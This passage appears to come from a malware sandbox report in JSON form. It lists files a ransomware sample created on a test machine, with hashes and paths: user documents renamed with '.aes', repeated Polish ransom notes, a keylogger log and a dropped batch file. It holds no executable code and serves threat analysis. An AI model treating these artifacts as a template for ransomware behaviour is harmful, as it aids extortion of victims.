"c:\\users\\kft6utqw\\appdata\\local\\temp\\tar8a09.tmp", "sha1_hash": "f2295d85679189d4fc1aac7c761be81447299ec5", "sha256_hash": "163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5", "size": 126167, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_19", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\cab8aa6.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_20", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\tar8aa7.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c859282002c93ab665ae07992074214b328caf50", "file_type": "created_file", "id": "file_22", "md5_hash": "d64d152896c18c6c805a792270a2df0f", "norm_filename": "c:\\programdata\\keyboard\\17102017_012722.log", "sha1_hash": "c859282002c93ab665ae07992074214b328caf50", "sha256_hash": "0bda07e2a3283ef8f30d50ddd1fc99b854a1d86c497fcd2572dfb2d65b46192e", "size": 544, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/40a933423897a3f92306a5881ac01c9181ca9afd", "file_type": "created_file", "id": "file_23", "md5_hash": "f2cab558712cd7186fcf61d6f3787620", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\1bus.odt.aes", "sha1_hash": "40a933423897a3f92306a5881ac01c9181ca9afd", "sha256_hash": "a3c45f43e438c138ca658fbb4e05734d8c15acce65427bec9135f091c2730593", "size": 72546, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9b36102fabaf1599b4f6f5f52c2645e3194aba67", "file_type": "created_file", "id": "file_24", "md5_hash": "cbe0aa03a088135610ec0779aba641c5", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "9b36102fabaf1599b4f6f5f52c2645e3194aba67", "sha256_hash": "10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9b36102fabaf1599b4f6f5f52c2645e3194aba67", "file_type": "created_file", "id": "file_27", "md5_hash": "cbe0aa03a088135610ec0779aba641c5", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "9b36102fabaf1599b4f6f5f52c2645e3194aba67", "sha256_hash": "10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f1a7ef9a881ffa6185da630da6e884b11bbb5260", "file_type": "created_file", "id": "file_25", "md5_hash": "dbcb43a9798c0304870a937e10d2b081", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\nvo-4p-kzz-c6do0e\\b-s_mvdiahrja wonyd7.csv.aes", "sha1_hash": "f1a7ef9a881ffa6185da630da6e884b11bbb5260", "sha256_hash": "9f939c63edf1a9169fd470cda68210ed428d86ca83cb9037c322f93c3c53929c", "size": 55778, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/34e0c518033bb64058b612e7ceeb20578d5ca2cd", "file_type": "created_file", "id": "file_26", "md5_hash": "da8d033bbbe5b451eac7b4ac77ee0d16", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\3frpiupvjo9pxh.doc.aes", "sha1_hash": "34e0c518033bb64058b612e7ceeb20578d5ca2cd", "sha256_hash": "b6182e025ca557bb2c1538d2d498ff163ec0bbca095149619f716358627077b8", "size": 69922, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/cc3baed9e423ca7029a69b5e05e7343f6b0fc22e", "file_type": "created_file", "id": "file_28", "md5_hash": "4420d02ae796332100cb6fb22d53981e", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\7wldze9wqqhkod.odp.aes", "sha1_hash": "cc3baed9e423ca7029a69b5e05e7343f6b0fc22e", "sha256_hash": "8bab0ee1a1e2d309eaf3bf055575b00828bb0f5ebab96a0ac6ae61f7c82ef4b4", "size": 75266, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1c42f8ae3849e66b3ac412a8dc101c63ed2459ba", "file_type": "created_file", "id": "file_29", "md5_hash": "2097ab114a5b50c789d3d41038337434", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\hvcemxs1islck.doc.aes", "sha1_hash": "1c42f8ae3849e66b3ac412a8dc101c63ed2459ba", "sha256_hash": "c18f2f582daa67496f9d55aacf60e3edb9dc74eadb1f3875af33ced36447f206", "size": 49826, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f60e537f2659ce20ce8b8f86092ffce3ba47bba6", "file_type": "created_file", "id": "file_30", "md5_hash": "58bf0255677de942755ea7b7dbcfaf10", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\pa730znol5.rtf.aes", "sha1_hash": "f60e537f2659ce20ce8b8f86092ffce3ba47bba6", "sha256_hash": "413416e46b46964f5d0fb72b330ffc5d7ac3c49bcfa6826cc9d04e70137aab25", "size": 11250, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/88ebb09b8b4b916f0bd5118e7ffb84b04880953f", "file_type": "created_file", "id": "file_31", "md5_hash": "46f2018c9afedc0f7cd8ceddb2e00e95", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\hkrkjnzp\\_x864g9nghehtp16yw.ods.aes", "sha1_hash": "88ebb09b8b4b916f0bd5118e7ffb84b04880953f", "sha256_hash": "2a99f7ac23b8090ab9004e5268c8381c66e4c13b8c6222260b645bb862a8e360", "size": 71506, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0fa780b46783b4d6d02c2fcdcc76e380964a8072", "file_type": "created_file", "id": "file_32", "md5_hash": "1dd5743b7642ab3f7ebf23a2c4d11bed", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\0qp cbtp2kdutxphn8y.csv.aes", "sha1_hash": "0fa780b46783b4d6d02c2fcdcc76e380964a8072", "sha256_hash": "48ed4ee93ac7712258e9692ffe388ffde95f41234bfbcf39de333d1478ce63fb", "size": 100930, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/933d96b6b6f3953641eb927871482d46a68587b1", "file_type": "created_file", "id": "file_33", "md5_hash": "0b5f0f80cc4b36b483bb621bb425c777", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "933d96b6b6f3953641eb927871482d46a68587b1", "sha256_hash": "e4841e111ff327774b47d7a880fc5ef644885929615b1a9b3ac325cf2ddcf0a4", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a886ac508b0e21b56829e27c1a68504a3bc25cf5", "file_type": "created_file", "id": "file_34", "md5_hash": "f8023e58ab11fa5ef5e9f6a263d672a3", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\f6p3h-e5k60slj.pdf.aes", "sha1_hash": "a886ac508b0e21b56829e27c1a68504a3bc25cf5", "sha256_hash": "c32e2e5fae3a1ba9c7ac5afb2e44ee719a2a7d79a06a25206ce41997d3693e1c", "size": 33554, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/40915812c97a291642b009625b59bddb3c09530d", "file_type": "created_file", "id": "file_35", "md5_hash": "28ebc3a1b1fe94cc03f43f3cdd76b961", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\iufdafezbb3p- l4i3e.rtf.aes", "sha1_hash": "40915812c97a291642b009625b59bddb3c09530d", "sha256_hash": "71425428390900f936b53991578c19e2161a143028209a919e297476d51db896", "size": 89170, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6cdfff84c93a0cde5805a2fe81a4f27d223daba0", "file_type": "created_file", "id": "file_36", "md5_hash": "663b3cb0a0ffde4211d6099d1d744572", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\pwqhqsjinpvfkbjkrzb.rtf.aes", "sha1_hash": "6cdfff84c93a0cde5805a2fe81a4f27d223daba0", "sha256_hash": "97ec7a84cbf36bc41d4a6ec973f3f76c725b5129ab814c7d93c56647b3f8739b", "size": 5474, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8bb40d5459ee9726d3728cd4c76fa35e800f5c5e", "file_type": "created_file", "id": "file_37", "md5_hash": "ab4d82455547a815c43ed9c055badce6", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p9grc6n9ugq9v\\t8rijba3r5ril.pptx.aes", "sha1_hash": "8bb40d5459ee9726d3728cd4c76fa35e800f5c5e", "sha256_hash": "8b3bcab35f8e11efb3807baa8785328322c03f0145f863422525df5e87ba0c76", "size": 34226, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d6d246bc12fcb5e67e121caf52d07feb6cce47ec", "file_type": "created_file", "id": "file_38", "md5_hash": "8e4cc4c2b7762bb926abbb3007736831", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\0_b3ijrl61ikm2.xls.aes", "sha1_hash": "d6d246bc12fcb5e67e121caf52d07feb6cce47ec", "sha256_hash": "8228409efa8aa583936fd32c6b3137ca5e4677c4c2c0cfaadd5a8e21cc54a2f3", "size": 55426, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3637ded2b5a9eb6beb9cf479ffe1324a240c8880", "file_type": "created_file", "id": "file_39", "md5_hash": "b862b4250082ea6c4db185c4068292b4", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "3637ded2b5a9eb6beb9cf479ffe1324a240c8880", "sha256_hash": "a81c24f504e998f5a0003223d74aeb74f0a4ecf81f06e979a4b468bc2c847bfc", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/86aea694a1065a8a261b8b878c25bedd8c5d5cdf", "file_type": "created_file", "id": "file_40", "md5_hash": "247b667d9fb0fc8b2eeb7f6b8dd15360", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\568wxqkdq_fimwon.pdf.aes", "sha1_hash": "86aea694a1065a8a261b8b878c25bedd8c5d5cdf", "sha256_hash": "c6a0aca2c5b19931f50fa52b0e3f24f854d7d5516ceac0983bb169d1de30d9bd", "size": 97602, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f29cdcc56481817d3507edbc5a67c188074d467d", "file_type": "created_file", "id": "file_41", "md5_hash": "c3fa5deca0032d11062c098aca043806", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\8m1fcp.ots.aes", "sha1_hash": "f29cdcc56481817d3507edbc5a67c188074d467d", "sha256_hash": "180f9e94819f02c6b8ff6e3d093973c16cc869c8e0871a429e312a85c235aed5", "size": 69570, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/7b682fcff36969b9c76b2b879668c588dca05da9", "file_type": "created_file", "id": "file_42", "md5_hash": "1c97627a6dbb86fd651e5a2ecdd1c439", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\p2qhvhrc07x 6m.odt.aes", "sha1_hash": "7b682fcff36969b9c76b2b879668c588dca05da9", "sha256_hash": "7dd3b123673fe046879e00ef60e78482ee4b53411830fe23ee03dce07644d068", "size": 51042, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d523dea27e8e78cfc129ad6e4c79f03681956d05", "file_type": "created_file", "id": "file_43", "md5_hash": "d9ea2dd5cc2040cebb83b1202a21bcc8", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\urm66b8mfk_b.docx.aes", "sha1_hash": "d523dea27e8e78cfc129ad6e4c79f03681956d05", "sha256_hash": "b805ff00bed7062529f73f3bd639421542860dbadfcd7fd470743ffa0054f1f7", "size": 55810, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/78f113ba271b320ebb256029640d38633fdfa053", "file_type": "created_file", "id": "file_44", "md5_hash": "e703703b34b46197760b09e17cf8df6a", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\vfwuhdcvzf0grto.pptx.aes", "sha1_hash": "78f113ba271b320ebb256029640d38633fdfa053", "sha256_hash": "179ef98c877640d95d681751c615cfd7cc26cb6735ad9dabbe158c20ffc95082", "size": 102290, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4b9e921ca48b9204bd2f0d15a22b77492363d379", "file_type": "created_file", "id": "file_45", "md5_hash": "760f9fb0025e83f024a3cf667642a529", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\oxq6tndno0\\wvf jpe1b.xls.aes", "sha1_hash": "4b9e921ca48b9204bd2f0d15a22b77492363d379", "sha256_hash": "c7946be6a97b1d1b8136be5226cbd00c1d01543afb780a5341d07fc9eb89d5d9", "size": 61378, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/36a31257d40b8f92f2f6cb1c3baabf73c0f2f3fe", "file_type": "created_file", "id": "file_46", "md5_hash": "8a8c0f566668e1b12b7fc374828700ec", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\n1mkd81vkeia7s2.rtf.aes", "sha1_hash": "36a31257d40b8f92f2f6cb1c3baabf73c0f2f3fe", "sha256_hash": "e6b2fd1d505f8752f242990ec1d3d79eae59bd57fef2b63aada93d2c531254de", "size": 43218, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/27afb65304d50a280fe85b6b8986766c6adf77f2", "file_type": "created_file", "id": "file_47", "md5_hash": "f9ae75622ad7932bde701dd30af9ab14", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "27afb65304d50a280fe85b6b8986766c6adf77f2", "sha256_hash": "866ea96120ab6a005968d8c52e61bec38d7bd6d57c5c88ce4ea616167c2322b7", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/dee9eab29048d71fc2c04bf18edb260bf12fb84e", "file_type": "created_file", "id": "file_48", "md5_hash": "2cf00a0b576815e19471a6cfe7a0d898", "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaminghhfhqi2h.wln.bat", "sha1_hash": "dee9eab29048d71fc2c04bf18edb260bf12fb84e", "sha256_hash": "1aaedbc63631dcece73558d47f1f587bf001ffd0d2bcfabd53fd220145238cbd", "size": 1648, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b75956081f84bff389f8fa4f973f4a347244584b", "file_type": "created_file", "id": "file_49", "md5_hash": "861e60657aebfcc7642f866b5a0a750a", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\orrmspmnhogtvab.doc.aes", "sha1_hash": "b75956081f84bff389f8fa4f973f4a347244584b", "sha256_hash": "2f5acaae23f5533756bebe73f7bbadbc5246b0ffe98e1116ef305d0e69e622bb", "size": 62946, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/23604d488a32495bb3421425f4e7cfa19fba158b", "file_type": "created_file", "id": "file_50", "md5_hash": "86c2590421d0d348a200f05dc4e7c4ad", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\pp5 bxjs.pptx.aes", "sha1_hash": "23604d488a32495bb3421425f4e7cfa19fba158b", "sha256_hash": "d7834715834fdb5e81ac4cb8101fcc07dca7426c95f47c8fd084518da41f816e", "size": 64562, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/279fa16faa121754dd7c8b8473384753fa6678cc", "file_type": "created_file", "id": "file_51", "md5_hash": "2a7bfc3cf0f4fbe0577883b7d30b24d1", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\qa6qfkq\\xlyls6yx0mico1.pps.aes", "sha1_hash": "279fa16faa121754dd7c8b8473384753fa6678cc", "sha256_hash": "0ee488c057b7eb0dea6fd92d10c54e4af2702a575372f8ce9c037cb3465c9dd4", "size": 2098, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5096048a6c050f8a854d340602ede89a93ed4a99", "file_type": "created_file", "id": "file_52", "md5_hash": "456eed0508e2413c39b2b8d84675eaca", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\-gjqedw.odt.aes", "sha1_hash": "5096048a6c050f8a854d340602ede89a93ed4a99", "sha256_hash": "4da6555871ca52baf7e32a27f507ed24c51ee682c510f203f5f2c25ed1d95654", "size": 102034, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d88cd92273a6ebdcb2f15397f26538225f72b569", "file_type": "created_file", "id": "file_53", "md5_hash": "8886e301646afb67cb7813dc0f7e02cf", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "d88cd92273a6ebdcb2f15397f26538225f72b569", "sha256_hash": "088385cb2c06a411ad885942c2622cfe1a5019eb813d8c864c6e9f207dd8996e", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8f540830fa6292849ed7e1e7467a9913dae51d65", "file_type": "created_file", "id": "file_54", "md5_hash": "f736d4fe414d5a96da5d318e17003b7a", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\8puhjof5oub0zf3kj4pk.ods.aes", "sha1_hash": "8f540830fa6292849ed7e1e7467a9913dae51d65", "sha256_hash": "23a952ff47965e370d1e0734bb24e961d17f388a0bcb699812214ad374293809", "size": 34034, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6ed8a239d5e5c66f7b902c5c150a485deca35888", "file_type": "created_file", "id": "file_55", "md5_hash": "629c3efd21e819bf8403e7bac426ff43", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\eqov.odp.aes", "sha1_hash": "6ed8a239d5e5c66f7b902c5c150a485deca35888", "sha256_hash": "45b0b2e857db63bebfa3b32e019df246fce7be46831e8915db236db3f03ef7ab", "size": 76786, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/355c5027b132c1362a9e432006d1908838ac5ff4", "file_type": "created_file", "id": "file_56", "md5_hash": "7d6189a5e358a3db01df0b2bc9d0266a", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\szjbmk.odt.aes", "sha1_hash": "355c5027b132c1362a9e432006d1908838ac5ff4", "sha256_hash": "1e60d21becf6a5139ee2f4954254cf9628791fa1113fd2cf8fd4ca92aea49232", "size": 73506, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/af48185220f49d199f1cd2dd0e185700d2c05629", "file_type": "created_file", "id": "file_57", "md5_hash": "153ee5db297301ffd96983788dccea06", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\twiwowooujkw1 zw.xlsx.aes", "sha1_hash": "af48185220f49d199f1cd2dd0e185700d2c05629", "sha256_hash": "32897f53047e553dc85126c580bbe2e66af2fc00e85086aa5328d2c997c85e0c", "size": 46546, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/affc2244157cb2ce3c91cf94b1b7386d44e08882", "file_type": "created_file", "id": "file_58", "md5_hash": "26f64e8f52b26de04290c2d83e4fb7c9", "norm_filename": "c:\\users\\kft6utqw\\documents\\6_uymfikkpct\\x4gpvtjmanpijoufg-lc.doc.aes", "sha1_hash": "affc2244157cb2ce3c91cf94b1b7386d44e08882", "sha256_hash": "23dddcc330308bdf3e54772f032afb7543cd69a2b44f12be89a8d9d8958ba1c6", "size": 60226, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/76b9971d5a40c71c7560e6cca39b44ad3ba52bc4", "file_type": "created_file", "id": "file_59", "md5_hash": "eb4ad3a71fef07c5a245e222165f1a97", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\0kc5nr5.rtf.aes", "sha1_hash": "76b9971d5a40c71c7560e6cca39b44ad3ba52bc4", "sha256_hash": "2a458896b551c6fd2d2a581d5b99f1e2899ae369d27222d6161ec53ee6584f7c", "size": 88242, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/793b0f06ae3ae91e2e9e35304e3ea4915fa5e036", "file_type": "created_file", "id": "file_60", "md5_hash": "d28ffc0599c0bf506262aaa0165f04e8", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "793b0f06ae3ae91e2e9e35304e3ea4915fa5e036", "sha256_hash": "0488eb29731384d0809a3b6ea398bf3696425c759803a0cf3cb07a750a8f1df9", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c1b405cbf7a26852d3309ffcccdc9145cfe217ca", "file_type": "created_file", "id": "file_61", "md5_hash": "d9f2d8ef5888f99a555ba812248ab13f", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\9oiefcy.csv.aes", "sha1_hash": "c1b405cbf7a26852d3309ffcccdc9145cfe217ca", "sha256_hash": "49a36342151e20aefbf760e22585680bb975b7b79bfad8e1894d735a116e9c7f", "size": 21458, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5c6391712575d5591befc65932fe87ef58475a2f", "file_type": "created_file", "id": "file_62", "md5_hash": "b2e7008bea1bf130a8fe4100c506c7cb", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\a2yhs.rtf.aes", "sha1_hash": "5c6391712575d5591befc65932fe87ef58475a2f", "sha256_hash": "5fae1cfde692ab6411ac4548c2c1567b2717e5fe3498533751337d34861c4af4", "size": 2338, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8e65889419c460fd1053a175bd6cb4ac2926d30c", "file_type": "created_file", "id": "file_63", "md5_hash": "add50a9d4fe1bbf810bc937bfdcbd5a2", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\jjjmv9taw3hhvo.ods.aes", "sha1_hash": "8e65889419c460fd1053a175bd6cb4ac2926d30c", "sha256_hash": "a0d78a02b9120cd272466d4abe2b6cf3eac07fce75124c69d44b767bf9b7889e", "size": 55906, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e3762ea1a5d3175a86be28e4701178f14286815f", "file_type": "created_file", "id": "file_64", "md5_hash": "c32036dd886239d37943c07ba0162421", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\okb6ch9a4iqri_jw.csv.aes", "sha1_hash": "e3762ea1a5d3175a86be28e4701178f14286815f", "sha256_hash": "12a6bfd65442d5a6dea0eb07df54c271530d9cacd50ca2c5d488f12bdc0b0137", "size": 91394, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/702ff432d5b62281f50f3b17cecd679caae3278f", "file_type": "created_file", "id": "file_65", "md5_hash": "6a14d50c775b23919f576eb8ccd008b5", "norm_filename": "c:\\users\\kft6utqw\\documents\\lq5_4qumspxkagf3\\pnxtgcqo4yh5r.odt.aes", "sha1_hash": "702ff432d5b62281f50f3b17cecd679caae3278f", "sha256_hash": "4786addec83d6e65d1d11d613d89e1d1f8a5c2bd394bcc3ad9283915bcab8059", "size": 73586, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4deb4e031cbcffb0db883c470281ad096a2ef6b0", "file_type": "created_file", "id": "file_66", "md5_hash": "f4141b893956c5fcaa6b6f5657bdf728", "norm_filename": "c:\\users\\kft6utqw\\documents\\31c8jf9y_xli.docx.aes", "sha1_hash": "4deb4e031cbcffb0db883c470281ad096a2ef6b0", "sha256_hash": "701a94fdfff7ee232bec3f9fdf7082d9f9936f193abf9c67eb083c85db255abd", "size": 91826, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0d71f61d9c8ccad698a30eb2908b921b1b14596f", "file_type": "created_file", "id": "file_67", "md5_hash": "8c73ebb6192923bd0767d3e8e5eaa3ba", "norm_filename": "c:\\users\\kft6utqw\\documents\\#$# jak-odzyskac-pliki.txt", "sha1_hash": "0d71f61d9c8ccad698a30eb2908b921b1b14596f", "sha256_hash": "bb77c9af9c798eb1a2a18bd21b70ea100c20530f4de7ca2370e64bc0f4267e4f", "size": 2604, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6d1dba81e71cb6803388eb92533786f337b63234", "file_type": "created_file", "id": "file_68", "md5_hash": "68f7c6e9369b2fa7185fc46e6264cf62", "norm_filename": "c:\\users\\kft6utqw\\documents\\4mqnx-qcbrpg7.docx.aes", "sha1_hash": "6d1dba81e71cb6803388eb92533786f337b63234", "sha256_hash": "3ecaf96c0f29ebb5688ce497f0d63ba88bcfcd8abfff76ddb2f2cf6d66c4c1d0", "size": 43170, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b36bbde406ae72f2c78467800a609095dcc89e07", "file_type": "created_file", "id": "file_69", "md5_hash": "6337e686c637acdb910f80da94d869b1", "norm_filename": "c:\\users\\kft6utqw\\documents\\aonimexn t.xlsx.aes", "sha1_hash": "b36bbde406ae72f2c78467800a609095dcc89e07", "sha256_hash": "6324ebb54dc1022d62d93931e6327dff103e4951f7a0f84a02d68b90f59c7850", "size": 25378, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/afb08ed85991523a3f618133db01c401f6dba5f6", "file_type": "created_file", "id": "file_70", "md5_hash": "aeeee30c5b77d154e1423af81dca3076", "norm_filename": "c:\\users\\kft6utqw\\documents\\bcatcic fci96kikr19.pptx.aes", "sha1_hash": "afb08ed85991523a3f618133db01c401f6dba5f6", "sha256_hash": "b636ce4e26604c5c79691ea2168de1c7c95b39f613feadedf5d39f1e74871c36", "size": 56322, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/7214cb54b3648d66efd5e1a2a0af95975182d7b7", "file_type": "created_file", "id": "file_71", "md5_hash": "1f9c6027cd30ae2e2cafc82f218b8ed0", "norm_filename": "c:\\users\\kft6utqw\\documents\\bdvwr.doc.aes", "sha1_hash": "7214cb54b3648d66efd5e1a2a0af95975182d7b7", "sha256_hash": "87d16ba0e6edc1bb891c79ac7d9a3e65cd1bdd4d09a6061be3282aa532a6f5c3", "size": 47266, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a2708ecf3b0dad7eb50900a8ef632c3b2c19bbeb", "file_type": "created_file", "id": "file_72", "md5_hash": "6e238555ba20055a197fc06cae44d052", "norm_filename": "c:\\users\\kft6utqw\\documents\\d-4thvumdh.csv.aes", "sha1_hash": "a2708ecf3b0dad7eb50900a8ef632c3b2c19bbeb", "sha256_hash": "832a5693695b7fc95556d4a45f1cb062a1369ce5addaee64920e10b4aed4e465", "size": 97554, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/4bae349c4c78751a39726411c591af439dc9ce6f", "file_type": "created_file", "id": "file_73", "md5_hash": "7e8911b50f352ff4575046afe9dfe30f", "norm_filename": "c:\\users\\kft6utqw\\documents\\ev0ylmk5921.pptx.aes", "sha1_hash": "4bae349c4c78751a39726411c591af439dc9ce6f", "sha256_hash": "4051677f29f7ec50a8f34a4c6c25132f2d53fed58c0dd7b0a7b483d0af0cf49b", "size": 90738, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/60a5945c047bacc4bc53eb314f296828e37d05c9", "file_type": "created_file", "id": "file_74", "md5_hash": "39cd60a5cccc800a9a3ca9aee965d469", "norm_filename": "c:\\users\\kft6utqw\\documents\\fbmldmouw-tzoy_unn7.xlsx.aes", "sha1_hash": "60a5945c047bacc4bc53eb314f296828e37d05c9", "sha256_hash": "3112ec6461a1bfbeb9c7d294be6e83bd11627f7933d8b059a0e594d3363261a3", "size": 39970, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b7b5bb27edb9a11bcb7b53bef291a0eb442102d9", "file_type": "created_file", "id": "file_75", "md5_hash": "043ba7ac688249dd26003e85ccdc0b84", "norm_filename": "c:\\users\\kft6utqw\\documents\\gxfwksunytgfj.pptx.aes", "sha1_hash": "b7b5bb27edb9a11bcb7b53bef291a0eb442102d9", "sha256_hash": "864d89e06f543e6e0eb75c454d825bbfb2bab8c80aa506275f388c2e973e3d6a", "size": 27394, "type": "extracted_file", "version": 1 